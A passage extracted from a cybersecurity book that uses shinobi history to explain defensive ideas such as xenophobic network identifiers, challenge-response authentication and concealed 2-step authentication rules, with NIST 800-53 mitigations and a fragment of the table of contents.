Whether they consciously think about it or not, interoperability is a top

priority for technology consumers: people expect their devices, apps,

systems, and software to work seamlessly with new and old versions and

across different platforms, as well as interchangeably with other makes

and models. The International Organization for Standardization (ISO),

the International Electrotechnical Commission (IEC), the Internet

28Chapter 3

Engineering Task Force (IETF), the Internet Society (ISOC), and other

governing bodies have established widely agreed-upon standards for how

technology is designed and should operate and integrate.

These efforts have produced many of the ISO standards, Request for

Comments (RFC), and other interoperability protocols that make com-

puters more accessible, not to mention easier to build, manage, diagnose,

repair, program, network, and run. A prime example is the Plug and Play

(PnP) standard introduced in 1995, which directs a host system to detect

and accept any foreign device plugged into it via USB, PCI, PCMCIA,

PCIe, FireWire, Thunderbolt, or other means and then autoconfigure,

load, install, and interface automatically.

Unfortunately, when the goals are to establish functionality and

maintain its operability, security is almost never a priority. In fact, the

PnP standard—which facilitates the trust and acceptance of unfamiliar

entities—was built to the exact opposite of the xenophobic security stan-

dard held by the medieval Japanese. For example, an unfamiliar system

can connect to a network as an outsider and request an IP address from

Dynamic Host Configuration Protocol (DHCP), ask for directions from

the local router, query the authoritative DNS server for the names of

other devices, and obtain local information from Address Resolution

Protocol (ARP), Server Message Block (SMB), Web Proxy Auto Discovery

(WPAD), and other protocols designed to ease the burden of compat-

ibility. You plug the system into the network and it works, demonstrating

behavior users expect and desire. However, the cybersecurity industry

would benefit from being more “xenophobic” in its networking protocols.

To mitigate weaknesses resulting from PnP-like accessibility, security

controls such as Network Access Control (NAC) and Group Policy Objects

(GPO) have been introduced. On host systems, these technologies safe-

guard against potentially malicious foreign devices that physically con-

nect to internal networks or systems.

NACs typically lock down the DHCP, assigning unrecognized com-

puters to guest IP subnets or unprivileged VLANs. This

,

allows foreign

systems to connect to the internet for general access but segments them

from the rest of the trusted network. Such behavior is especially desirable

for conference rooms and lobbies so that external business partners and

vendors can operate without exposing the network to threats.

GPO on local hosts enforces what types of devices—external hard

drives, USBs, media readers, and the like—can be configured and

installed on a system. GPO can even whitelist known applications within

an organization while simultaneously blocking all unfamiliar software

from downloading or installing on the host system.

Xenophobic Security29

However, these security controls are notable exceptions. From RJ45

Ethernet jacks using the EIA/TIA-561 and Yost standards to packet-

based networking using the IEEE 802 standards—and everything in

between—most technologies are built with transparent, widely known,

default standards that ensure quick and easy use across foreign systems

and networks, leaving them vulnerable to unauthorized rogue systems

that may conduct network discovery, reconnaissance, sniffing, and

communication.

Developing Unique Characteristics for

YourEnvironment

Having unique properties and characteristics in your IT inventory will

help to distinguish your assets from rogue assets that may enter your

environment and even protect your network from compromise. These

characteristics are observable through inspection or analysis, but their

use should not be publicly disclosed, as such disclosure would defeat

the countermeasures. Most elements within modern IT systems and

software are configurable, and such configuration changes effectively

create a xenophobic IT model in your systems.

Recently introduced commercial products that use a zero-trust model

can help make your network or systems “xenophobic” to unfamiliar sys-

tems, software, and devices through a combination of technical protocols

and distrust. Strict whitelists and authentication/authorization proce-

dures can achieve similar results, but a proper solution would introduce a

computer version of “dialects”—settings, customs, and other unique char-

acteristics that deviate from universal computing standards. Systems or

devices connecting to your internal network would need to be “indoctri-

nated” to the unique culture of your organization, while unindoctrinated

servers, components, networking devices, and protocols would distrust

or reject the unfamiliar foreign agent and alert the security team to its

presence.

With some creativity and engineering, these cultural computer

identifiers could be implemented at any layer of the Open Systems

Interconnection (OSI) model (application, presentation, session, trans-

port, networking, data link, physical) to identify network outsiders and

provide an additional layer of defense against adversaries. Whether it’s

transposing certain wires in hidden adapters of RJ45 jacks, expecting

secret handshakes (SYN, SYN ACK, ACK-PUSH) at the TCP/IP level, or

using reserved bits in the Ethernet header, a xenophobic solution should

be modular, customizable, and unique per instance.

30Chapter 3

C A S T L E T HEORY T HOUGH T E X E RCISE

Consider the scenario in which you’re the ruler of a medieval castle with valu-

able assets within . You notice that one of the local fishermen, who sells fish

to your cooks, preserves the fish in an unfamiliar fashion and has a strange

dialect . When asked about his unique storage methods, he claims he does

it that way because the fish tastes better . He doesn’t have a surname you

recognize .

What culturally unique identifiers could you use to determine whether

the fisherman is an outsider, and how might you apply that test? If the fisher-

man claimed he was born in your village but temporarily moved away, how

would you verify his story? If you couldn’t verify his story and suspected him

of being a spy, how would you manage the threat without exiling or execut-

ing a potentially innocent fisherman? To answer these questions, you’ll need

to consider three scenarios: the fisherman is indeed a spy, the fisherman is

not a spy, and the fisherman’s purpose is impossible to know . You can ask a

partner to play the part of the strange fisherman by secretly choosing one of

the roles beforehand, or you can play both roles of interrogator and fisher-

man in your head .

This exercise helps you think deeply about asset identification using

xenophobic mental models while avoiding technical discussions of computer

standards and inventory control . While the scenario is fictitious, shinobi likely

disguised themselves as fishermen sometimes, as such a cover would give

them an excuse to loiter for hours, chat with locals, and perform reconnais-

sance on targets .

Recommended Security Controls and Mitigations

Where relevant, the following recommendations are presented with an

applicable security control from the NIST 800-53 standard. Each should

be evaluated with the concept of xenophobic security in mind.

1. Inspect systems to determine whether their specifications or

requirements deviate from the previously agreed-upon baseline

configuration. [CM-2: Baseline Configuration]

2. Maintain documentation of all information systems in your orga-

nization so you can more readily identify foreign systems in your

environment. [CM-8: Information System Inventory]

3. Use encrypted information, embedded data, special data types,

or metadata (for example, padding all packets to be a certain

size) as special identifiers in communications so that filters can

Xenophobic Security31

identify and restrict unfamiliar traffic. [AC-4: Information Flow

Enforcement; SA-4: Acquisition Process]

4. Restrict the implementation and knowledge of xenophobic iden-

tifiers to newly acquired systems and devices. [SA-4: Acquisition

Process]

5. Embed xenophobic inspection as a security control for identify-

ing and authenticating systems and devices in your organization.

[IA-3: Device Identification and Authentication]

Debrief

This chapter described the historically xenophobic environment for shi-

nobi that required the investment of time and effort, as well as advanced

techniques, to perform preparatory reconnaissance using open disguise

tactics before actual target reconnaissance could begin. You learned the

concept of anti-privilege and how to create unique internal characteris-

tics to identify rogue assets or users in your environment. Now you may

be able to identify key resources or people who are likely targets in your

environment that you perhaps hadn’t considered as attack vectors from

previous threat-modeling exercises, and you can then consider the sys-

tems or accounts that work closely with these potential targets.

However, by using the correct insignia, clothing, hairstyle, accent,

and other characteristics, shinobi could evade the xenophobic inspections

detailed in this chapter. Therefore, in the next chapter, we’ll explore the

matched-pair security technique historically used by Japanese lords to

detect shinobi who might otherwise infiltrate their fortification by using a

disguise.

4

I D E N T I F I C A T I O N C H A L L E N G E

Though there are ancient ways for identifying marks, passwords,

and certificates, unless you invent new ones and rotate them,

the enemy will manage to infiltrate by having similar fake ones.

During a night attack, you may have the enemy follow you

and get into the ranks of your allies. To prevent this, have a

prearranged policy—a way to identify your allies.

—Yoshimori Hyakushu #27

Imagine the following historical scenario: after dispatch-

ing a large group of troops on a night raid, a military

commander must open the gates to allow them back

inside their fortification. Night raids helped win battles,

but they also presented opportunities for a counterattack.

An enemy shinobi could forge or steal a uniform from the

attacking troops and blend into their formation

,

as they

returned to their base.

To combat this threat, commanders implemented a onetime pass-

word for the raiders to use before they could pass through the gate—but

this password was easily defeated: the disguised shinobi would overhear

34Chapter 4

the password when it was spoken by the soldier ahead of them in line. So

commanders tried other identification methods. Some required the raid-

ers to all wear underwear of a certain secret color that could be inspected

upon their return, but clever shinobi would carry or wear undergarments

in multiple colors, then selectively pull back layers of underwear so only

the correct color would be visible during inspection. Additional counter-

measures included changing passwords multiple times per day (which

still didn’t prevent a shinobi from overhearing the current password) and

unique uniform insignia or tokens (which a shinobi could steal from the

corpse of a dead soldier after the raid).

The shinobi categorized these techniques as either the art of open

disguise (yo-nin, which translates literally to “light shinobi”) or the art of

hidden infiltration (in-nin, which translates literally to “dark shinobi”).

In this case, open refers to being plainly visible; for example, the attacker

could wear the uniform of a defending soldier, fully expecting to be seen.

Hidden, on the other hand, refers to trying not be seen, such as by using

camouflage or blending into the shadows. Many of the assorted open dis-

guise techniques described in Bansenshūkai could be used both offensively

and defensively. Shinobi knew not only how to use these techniques for

their own attacks but also how to spot enemy infiltrators. It was common

for spies to replicate uniforms and crests or overhear passwords, so shi-

nobi developed identification countermeasures to distinguish their allies

from enemies.

One such identification technique was matched pairs, word combina-

tion challenges used to authenticate allies.1 This technique is also known

as countersigns or challenge-response authentication. The matched-pairs tech-

nique worked as follows: an unidentified person approached a guard at

the gate of a castle and requested entry. The guard first checked to ensure

that the stranger was wearing the correct uniform and bearing the proper

crest. If they were, then the guard uttered a word—“tree,” for example.

If the stranger did not respond with the correct prearranged match—

“forest”—the guard knew they were dealing with an enemy. While the

Bansenshūkai states that matched-pair phrases should be simple enough

that “lower-rank” people can remember them, it advises against using

common associations that an adversary might guess. So, instead of “snow”

and “mountain,” a more desirable pair might be “snow” and “Mount Fuji.”

The scroll recommends that shinobi work with commanders to generate

100 different pairs of matching words every 100 days and use a new pair

every day.2 This large number of matching pairs would allow a sentry to

rotate randomly through the list (if necessary) as each troop approached,

making it unlikely that a disguised enemy could overhear the answer to

the challenge word they would receive.

Identification Challenge35

Matched pairs were used to reveal possible infiltrators. If the stranger

answered the challenge incorrectly, they were quickly detained, interro-

gated, and possibly killed. Knowing these consequences, Bansenshūkai rec-

ommends that shinobi attempting to infiltrate an enemy camp style their

appearance, behavior, and speech as that of a slovenly or lower-class sol-

dier. This way, if they were asked to answer a matched-pair challenge they

didn’t know, they could convincingly claim ignorance.3 Some readers may

note that their financial institution has started implementing matched-

word or image pairs for online authentication, but it should be noted that

these websites do not require 100 different pairs and do not update them

frequently, if at all. A small pool of static matched pairs makes it possible

for an adversary to observe all the pairs and then perform unauthorized

actions with the stolen authentication responses.

These historical examples underscore the challenges in trying to

safeguard authentication from an advanced and dynamic adversary. In

this chapter, we will touch on how difficult it can be to prove your iden-

tity, along with the various factors used in information assurance (IA) to

authenticate someone’s identity. I will mention some of the techniques

that modern cyber threat actors use to thwart the best efforts to authen-

ticate only the correct people and highlight analogous shinobi tactics

that illustrate why authentication will be a challenge for the foreseeable

future. I will also provide readers with guidance on how they might apply

shinobi authentication techniques to modern applications. The overall

goal of this chapter is to help readers grasp the essential issues involved

in this identification problem rather than getting lost in the expansive

knowledge domain that authentication and cryptography have become.

Understanding Authentication

Authentication is the process of confirming a user’s identity before grant-

ing access to information systems, data, networks, physical grounds, and

other resources. Authentication processes confirm user identities by ask-

ing for something the user knows, something the user has, or something

the user is. For example, an authenticator might ask for a password (some-

thing the user knows), a token (something the user has), or a biometric

(something the user is). Depending on the level of security necessary,

organizations require single-factor, two-factor, or multifactor authentication.

Mature organizations might also use strong authentication, which

uses multiple layers of multifactor credentials. For example, the first

step of strong authentication might require a username, password,

and fingerprint, while the second step authenticates with a token and

a onetime code sent over SMS. Increasingly, industry professionals are

36Chapter 4

contemplating the feasibility of a fourth factor, such as a trusted person

in the organization who would confirm the user’s identity. Interestingly,

the matched-pair shinobi scenario starts with this test; the challenge is

used only if no one in the area can validate the stranger’s identity.

Authentication failure is a critical security flaw. Users’ authenticated

identities are tied to permissions that allow them to perform specific,

often privileged, actions. An adversary who successfully piggybacks

on a valid user’s authenticated connection has free access to the user’s

resources and can conduct malicious activities on information systems,

data, and networks.

Unfortunately, the authentication process is imperfect. Despite a

slew of cyber authentication measures, it’s currently not possible to verify

the identity of a user or process with complete certainty, as nearly every

existing verification test can be spoofed (spoofing is the use of false data

to impersonate another entity) or compromised. Adversaries use numer-

ous techniques to steal passwords, intercept tokens, copy authentication

hashes or tickets, and forge biometrics. If attackers gain unauthorized

access to identity management systems, such as domain controllers,

they can create and authenticate to fraudulently forged accounts. After

usersauthenticate, their identities are rarely challenged during a session,

unless password reentry is required to conduct privileged tasks. Similarly,

shinobi in disguise could wander around the inside of a castle without

being challenged—in both cases, it’s assumed those inside have been

authenticated.

Security technologies are evolving to fight authentication threats. One

emerging solution, called continuous authentication or active authentication,

constantly verifies user identities after the initial login. However, because

continuous authentication dialogs

,

might hinder the user experience, tech-

niques are also being developed to monitor authentication through typing

style, mouse movement, or other behavioral traits associated with user

identities. Such techniques would catch adversaries who were physically

accessing logged-in systems that had been left unattended, locking them

out. This would also work with unauthorized remote access methods,

such as Remote Desktop Protocol (RDP) sessions. Such techniques could

identify attackers even if they used valid credentials and authenticators to

log in. Of course, a person’s behavior may change. Moreover, even specific

behaviors can be mimicked or simulated by sophisticated adversaries by

incorporating user behavior reconnaissance into their attacks.

One possible implementation of the matched-pair model involves a

human-machine interface that uses passive brainwave sensors connected

to a system that verifies identity based on how the user thinks. Research

demonstrates that humans generate unique brain patterns when they

Identification Challenge37

see an object with which they have interacted before or have a specific

thought association. As such, showing a user controlled stimuli (such as

matched-pair word or image combinations), monitoring the brain’s elec-

trical responses, and matching them to a user profile could accurately

authenticate the user. With enough unique challenge pairs dynamically

generated with stylized permutations, it’s unlikely that adversaries could

replay or simulate a user’s brainwave activity when prompted.

In the next section, we’ll discuss some techniques you can use for

matched-pair authentications.

Developing Matched-Pair Authenticators

Following are a few suggestions for developing matched-pair authentica-

tors and ideas for applying them.

Work with the right commercial authentication vendors. Seek out

vendors that use challenge phrase authentication that is distinct from

a user’s password, account name, or other identifying information

that an adversary could compromise. While some financial organi-

zations use matched-pair challenge phrases before they authorize

account changes, unfortunately this method is typically used only

when the user reports they’ve lost or forgotten their password, and

the challenge phrases are static and don’t change.

Develop new authentication systems. An authentication product

might integrate with identity controls to present a matched-pair

challenge to an authenticated user whenever they attempt to perform

privileged actions, such as admin/root/ system commands. Under this

protocol, even if adversaries observed one or several challenge pairs,

their request to perform privileged actions would be denied.

An ideal product uses two forms of matched-pair challenges:

daily and user preset. The daily challenge, disseminated nondigitally

in areas that are visible only to authorized personnel, challenges

on-premise authentication requests with a word or image and asks

the user to respond with the match. All other employees, including

remote/VPN employees, establish a large set of matching word pairs

that are not likely to be forgotten or misinterpreted. The organiza-

tion chooses the pairs at random or rotates them to quickly pinpoint

unauthorized users that have been authenticated on the network.

(Note that to prevent an adversary from inserting their own matched

pairs for compromised or spoofed credentials, there must be secured

transmission, storage, and auditing of new matched pairs to the

active challenge system.) Consider using a one-way interface to insert

matched pairs in a secure controlled information facility (SCIF) or

38Chapter 4

segmented room that requires manual authentication and authoriza-

tion to enter and use. Other mechanisms could allow organizations to

ambush an unidentified user by requiring access to their microphone,

camera, location, running processes, running memory or cache, desk-

top screenshot, and other information on their connecting system,

thereby better identifying the origin and identity of the threat.

C A S T L E T HEORY T HOUGH T E X E RCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable assets within . You successfully complete a raid on an enemy army

and return to your castle . A soldier in your army wishes to approach you and

present the severed head of an enemy commander you defeated in battle, as

is traditional . This warrior wears your uniform and displays the correct crest,

knows the password of the day, appears to know their way around the inte-

rior of your castle, and waits for permission to enter your inner stronghold to

pay their respects .

Consider how you might handle suspicious individuals who pass normal

authentication checks requesting privileged access . What existing security

protocols or authentication processes would help you determine whether this

warrior is an enemy shinobi in disguise who intends to do you harm? Other

than outright rejecting the warrior’s request, how might you mitigate the risk if

you cannot verify their identity?

Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with an applicable secu-

rity control from the NIST 800-53 standard. Each should be evaluated in

the context of matched-pair identification and authentication challenge

responses.

1. Implement session locks after set periods of time for privileged

accounts, upon privileged user requests, or in reaction to suspi-

cious behavior. Only reestablish access after the user provides

a matched-pair challenge response. (A session lock may be

preferable to a normal password lock because the challenge

pair match is a single click or a simpler word than the user’s

account password.) [AC-11: Session Lock; IA-2: Identification

and Authentication (Organizational Users) | (1) Network Access

to Privileged Accounts | (3) Local Access to Privileged Accounts;

Identification Challenge39

IA-10: Adaptive Identification and Authentication; IA-11:

Re-Authentication]

2. Identify, document, and enforce security controls on which

user actions may be performed on a system without passing the

matched-pair challenge response—for example, contacting

technical support or making emergency calls. [AC-14: Permitted

Actions Without Identification or Authentication]

3. Develop matched-pair authentication processes that are resistant

to replay attacks by establishing large sets of onetime challenge

response authenticators. [IA-2: Identification and Authentication

(Organizational Users) | (8) Network Access to Privileged

Accounts—Replay Resistant]

4. Capture information that uniquely identifies user devices

requesting authentication to gain intelligence on unidentified

adversaries who fail the matched-pair challenge response. [IA-3:

Device Identification and Authentication | (4) Device Attestation]

5. Require in-person matched-pair input to mitigate compromise

of the challenge response identification system. [IA-4: Identifier

Management | (7) In-Person Registration]

6. Physically and logically segregate the matched-pair challenge

response system and enforce strict access controls to safeguard

it against compromise. [IA-5: Authenticator Management | (6)

Protection of Authenticators]

Debrief

This chapter highlighted the challenges faced by commanders who

needed to verify the identity of their troops to prevent disguised shinobi

from infiltrating their fortifications. You learned about the matched-

pair identification technique, both how it was used by shinobi to detect

enemies and what safeguards shinobi took against the technique when on

the offensive. You also saw the modern analogs of this technique in com-

puter security authentication and identification.

In the next chapter, you will use your understanding of authentica-

tion factors and historical challenge response to learn how two-step

authentication is different from but complementary to matched

,

pairs.

Iwill discuss a concealed shinobi authentication technique, the double-

sealed password, which can be used to detect sophisticated infiltrators.

5

D O U B L E - S E A L E D P A S S W O R D

Sometimes, a set of signs such as pinching the nose or

holding the ear should be used with these passwords.

Aikei identifying signs include techniques of

tachisuguri isuguri—that is, standing and sitting

while giving passwords.

—Bansenshūkai, Yo-Nin II

Both Bansenshūkai and the Gunpo Jiyoshu scrolls describe

an open-disguise detection protocol supposedly devised

by 14th-century samurai Kusunoki Masashige.1 Tachisuguri

isuguri signal techniques use gestures, posture, or body

positioning as a secret authentication factor, thus adding

a layer of security to the password verification process.

These techniques form what’s called a double-sealing2 pass-

word system, designed to catch disguised enemy shinobi,

even if they could pass other authentication challenges

with stolen passwords, identifying marks, and correct

challenge response words.

42Chapter 5

In the most common example of tachisuguri isuguri, a person

bearing the correct uniform and crest approaches a gate for entry. Not

recognizing the stranger, the guard chooses to either sit or stand, then

whispers a challenge word. If the visitor is an ally who has been briefed

onthe tachisuguri isuguri identification protocol, they perform the pre-

arranged corresponding action in response—a non-obvious signal such

as touching their nose or ear—and whisper the matching code word. The

guard permits entry only if the stranger answers with both the correct

code word and the correct physical movement. (There may be multiple

ways to implement tachisuguri isuguri besides having the guard stand or

sit, but unfortunately those methods are believed to be recorded in the

Teikairon scroll, a lost supplemental section of Bansenshūkai.)3

The simple brilliance of this technique is that the act of standing or

sitting is usually not given a passing thought. Even a malicious observer

trying to impersonate authorized personnel would likely fail to notice

this second, silent challenge response. They may watch 100 people enter

a gate using the same passphrase while the guard sits (because he rec-

ognizes them all), and thus they will not see how the interaction differs

when the guard stands. Tachisuguri isuguri was successful enough that

even other shinobi did not have adequate countermeasures to thwart it,

though Bansenshūkai instructs shinobi to mirror what guards do and say

at all checkpoints, even if the guards seem to be acting without conscious

intent;4 if nothing else, this could confuse the guard into believing the

shinobi is disorganized or simply stupid. The scrolls also provide this

helpful advice to any shinobi who fails an unknown tachisuguri isuguri

challenge: either think fast and talk fast—or run for your life.5

While the shinobi scrolls are not explicit in their definition of double-

sealing and I have no evidence that the following hypothetical example

actually occurred, I still feel it’s a plausible illustration of the concept.

Seals, often impressed into wax, have been used since ancient times

to secure the content of a letter or scroll. Ideally, each sender of com-

munications had a unique metal stamp and so was the only person who

could make a particular mark, thus verifying a document’s authenticity.

In addition, if anyone other than the intended recipient were to open

the letter or scroll, the seal would break, indicating that tampering had

takenplace.

However, spies learned that with special heating techniques, they

could loosen the wax, remove the seal intact without harming the paper,

read the missive’s contents, and then reseal the original document or

affix the seal to a newly forged document that included misinformation.

A counter to the technique of melting the paper side of the wax seal may

have been to “double-seal” the wax. Imagine that instead of a single metal

Double-Sealed Password43

stamp, the author used a clamp or vice-like device with both a front and

back stamp. The underside of the wax wafer would be given a hidden seal

on the underside of the paper that could be inspected only by ripping

the document open. Attempts at melting the seal off the paper might pre-

serve the top seal but would destroy the second hidden seal, thus making

the communication double-sealed.

You can see why double-sealing was adopted as an effective counter-

measure against attempts to penetrate a single seal and how it helped

detect the activity of enemy shinobi. In this chapter, I will note the differ-

ence between two-factor authentication and second-step authentication.

I’ll also discuss how a modern second-step authenticator could be double-

sealed to improve its effectiveness. I will then describe what I believe are

the requirements and criteria for implementing double-sealed passwords,

along with implementations that use existing authenticators and technol-

ogy. My hope is that after performing the thought exercises and seeing

my examples for implementations of double-sealed passwords, you will

appreciate the genius of Kusunoki Masashige and try this highly intuitive

idea out yourself.

A Concealed 2-Step Authentication

Increasingly, more cyber authentication and identification protocols

require a layer of security on top of a password. This is called 2-step

authentication: the second step requires a user to perform an additional

authentication action, such as providing a secret code or clicking a button

on an out-of-band device (that is, one not involved in the rest of the authen-

tication process). Note the slight difference from last chapter’s two-factor

authentication, which is used to prevent an adversary from accessing an

account with stolen login credentials.

While the secret code (second step) can be randomized through

software applications, it is typically generated each time using the same

procedure. Unfortunately, this procedural rigidity gives adversaries a

number of opportunities to compromise 2-step authentication methods.

For example, a 2-step authentication code is typically sent in a cleartext,

unsecured message that can be intercepted via phone cloning. In this

case, a user who receives the code 12345 and enters that sequence at the

passcode prompt also inadvertently provides the code to the adversary.

The device used to authenticate—often a phone—can be stolen, hijacked

via call forwarding, or cloned and used by the adversary to complete the

authentication. Similarly, the out-of-band device established for deliver-

ing 2-step codes could be lost or stolen and used to bypass the authentica-

tion process, allowing the adversary to steal user-provided backup codes.

44Chapter 5

A 2-step code that was double-sealed with a tachisuguri isuguri

technique could mitigate some of the weaknesses inherent in authenti-

cation procedures. Each user should be able to establish a prearranged

tachisuguri isuguri identifier that is unique and meaningful to them. For

instance, suppose a user has been instructed, either orally or by another

secure method, to transpose the digits in their 2-step code across the

number 5 on the keypad—1 becomes 9, 2 becomes 8, and so on6—but

only when the code displays in red font rather than the normal green.

This color change is the silent tachisuguri isuguri factor, triggered when

the system finds the authentication request suspicious due to the odd

hour, an unrecognized device or different IP address making the request,

or other criteria. (To conceal it from adversaries who may be observing

logins, this protocol should not be used too frequently.) Now, when the

legitimate user receives the red code 12345, they know to respond 98765,

while an adversary who has stolen the user’s credentials but is not aware

of the concealed rule enters 12345. This halts the authentication pro-

cess, flags the account

,

for investigation, and adds a 2-step authentication

failure to the session. The 2-step authenticator then sends a hint—“Use

authenticator protocol #5,” perhaps along with another red code, such

as 64831 (to which the user should respond 46279). Another incorrect

response triggers further alerts or account lockout.

Developing Double-Sealed Passwords

A double-sealed security solution that integrates with industry-standard

authorization controls would do the following:

1. Be used only when the user’s identity is suspect, such as when users:

• Log in from a new device, location, IP address, or time window

• Report that their mobile device has been stolen or

compromised

• Lose their backup token, code, or password and need to reset

their password

2. Use an out-of-band or side-channel communication method.

3. Use a secret, rule-based knowledge factor. Each user should be able

to customize the protocol to create a unique set of concealed rules.

4. Leverage authentication factors that are easy to understand and

remember, yet not obvious.

5. Allow rules to be stacked on top of each other in the case of

wrong consecutive guesses or enough time passing between

authentication attempts.

Double-Sealed Password45

6. Enable the restriction, freezing, or locking out of an account that

has failed authentication too many times. Most applications have

a lockout after consecutive wrong passwords but not consecutive

wrong 2-step authentication attempts.

7. Not be described in any help desk SOPs or other documentation.

Employees should also refrain from talking openly about the

double-sealed security layer.

Popularizing double-sealed security requires designers, engineers,

and users to explore what is technically feasible and apply creative

thinking. For example, consider the various input variations that can

be used on existing mobile devices with a 2-step authentication app and

require only that the user press Yes or No buttons to verify their iden-

tity. Following are some examples to demonstrate the range of possible

responses when the user is given the tachisuguri isuguri signal in their

2-step authentication app:

1. The user rotates their screen upside down before select-

ing Yes, and the app performs a silent inspection of

the DeviceOrientation status to test whether it equals

portraitUpsideDown.

2. The user manipulates the physical volume buttons on the mobile

device to set the OutputVolume to 0.0 (silent) or 1.0 (max) before

selecting Yes, and the app performs a silent get of the volume

float value to test whether it matches the intended value.

3. The user waits to select Yes until they observe the mobile

deviceclock roll over to the next minute, when they immedi-

atelyselect Yes. The app performs a silent timestamp request

to compare the time of selection to HH:MM:0X, where X is less

than3 seconds.

4. The user uses excessive pressure when selecting Yes on the mobile

device, and the app performs a silent get of the UITouch.force

of the event to determine whether it was greater than a preset

threshold.

5. The user performs multiple quick taps of the Yes button on the

mobile device, and the app performs a silent get of the tapCount of

the UIEvent to determine if it is less than 2.

6. The user performs a gesture while selecting the Yes button

on the mobile device, and the app performs a silent get of the

UIGestureRecognizer to determine whether it was a Pinch, LongPress,

Swipe (up, down, left, right), or Rotation.

46Chapter 5

C A S T L E T HEORY T HOUGH T E X E RCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable assets within your stronghold . You’ve been told that your identify-

ing marks, crests, secret signals, and other identification methods have been

disclosed to enemy shinobi, who can replicate them and gain entry to your

castle . You already change these passwords and signs three times a day, but

you are told that shinobi can keep up with these changes, even though you

are unsure how .

Consider how you might implement tachisuguri isuguri to catch enemy

shinobi . Could you create nonbinary tachisuguri isuguri—in other words, con-

cealed rules more complex than sitting or standing? How would you protect

the tachisuguri isuguri authentication process to prevent the enemy shinobi

from learning it? How could you layer tachisuguri isuguri to perform a test for

operational security leaks among your personnel?

Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with an applicable secu-

rity control from the NIST 800-53 standard. Each should be evaluated in

terms of 2-step (double-sealed) authentication.

1. Utilize Out-of-Band Authentication (OOBA) through a separate

communication path to verify that authentication requests origi-

nate from verified users. [IA-2: Identification and Authentication

| (13) Out-Of-Band Authentication]

2. Ensure that staff do not disclose the existence of concealed rules

for 2-step authentication. [IA-5: Authenticator Management | (6)

Protection of Authenticators]

3. Establish multiple double-sealed rules so the tachisuguri isu-

guri is not static. [IA-5: Authenticator Management | (7) No

Embedded Unencrypted Static Authenticators]

4. Implement out-of-band communication and establish double-

sealed rules to maintain confidentiality. [SC-37: Out-Of-Band

Channels]

5. Carefully design error messages for failed authentication

attempts so they do not reveal double-sealed password informa-

tion that an adversary could exploit. [SI-11: Error Handling]

Double-Sealed Password47

Debrief

In this chapter, you learned about an anti-shinobi authentication tech-

nique called the double-sealed password or tachisuguri isuguri. We cov-

ered the distinction between factors and steps in the identity verification

process. Then we undertook a brief analysis of the criteria for a good

tachisuguri isuguri authenticator along with several examples.

In the following chapter, we will discuss a shinobi concept called the

hours of infiltration. You’ll learn how certain hours of the day provide

advantageous opportunities for infiltration. Understanding these time-

based opportunities may help you choose when to implement or trigger

tachisuguri isuguri authenticators in your organization, such as only dur-

ing certain hours or on specific dates, to minimize the use of tachisuguri

isuguri and safeguard its secrecy.

6

H O U R S O F I N F I L T R A T I O N

After waiting until the hour of Ox, the ninja realized

that the guard had fallen asleep; everything was dead quiet,

and the fire was out leaving all in darkness.

For a shinobi, it is essential to know the proper time. It always

should be when the enemy is tired or has let their guard down.

—Yoshimori Hyakushu #5

When planning theft, espionage, sabotage, assassina-

tion, or other attacks, shinobi were not burdened by the

spirit of good sportsmanship or fair play. To the contrary,

they carefully considered the most “advisable times and

advantageous positions”1 to strike. The Shoninki stresses

the importance of waiting to infiltrate until a target is dis-

tracted, lethargic, likely to be hasty in judgment, drinking

and carousing, or simply exhausted; Yoshimori Hyakushu

poem 63 states that one’s tiredness “could be the cause of a serious blun-

der.”2 Shinobi were keen observers of such behavior and would often infil-

trate when an enemy was cutting down trees, focused on setting up their

own position, feeling tired after a fight, or changing guards.3

50Chapter 6

In studying their enemies’ behavior, shinobi noticed that predictable

human routines created windows of opportunity for attack. The scrolls

divide the day into two-hour blocks and recommend planning infiltration

during the blocks that tend to align with waking, eating, and sleeping. The

appropriate hour depends on the type of attack. Night attacks, for instance,

are best undertaken during

,

. . . . .

Chapter 26: Shinobi Tradecraft . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Notes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

. 213

. 223

C O N T E N T S I N D E T A I L

FOREWORD XVII

ACKNOWLEDGMENTS XIX

INTRODUCTION XXI

About This Book . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxii

A Note on the Castle Theory Thought Exercises . . . . . . . . . . . . . . . . . . xxiii

For Future Use . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxiv

A Ninja Primer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxiv

The Historical Ninja . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxiv

The Ninja Scrolls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .xxv

Ninja Philosophy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxvi

Ninja Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxvii

1

MAPPING NETWORKS 1

With these maps, the general can consider how to defend and attack a castle.

Understanding Network Maps . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2

Collecting Intelligence Undetected . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6

Creating Your Map . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9

Recommended Security Controls and Mitigations . . . . . . . . . . . . . . . . . . . . . . 13

Debrief . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13

2

GUARDING WITH SPECIAL CARE 15

Even castles with strong fortifications should be guarded, paying particular

attention to the recessed corners.

Understanding Attack Vectors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16

The Concept of Guarding . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17

Guarding Within a Cybersecurity Framework . . . . . . . . . . . . . . . . . . . . . . . . 17

Threat Modeling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18

xContents in DetailxContents in Detail

Using Threat Modeling to Find Potential AttackVectors . . . . . . . . . . . . . . . . . 20

Recommended Security Controls and Mitigations . . . . . . . . . . . . . . . . . . . . . . 23

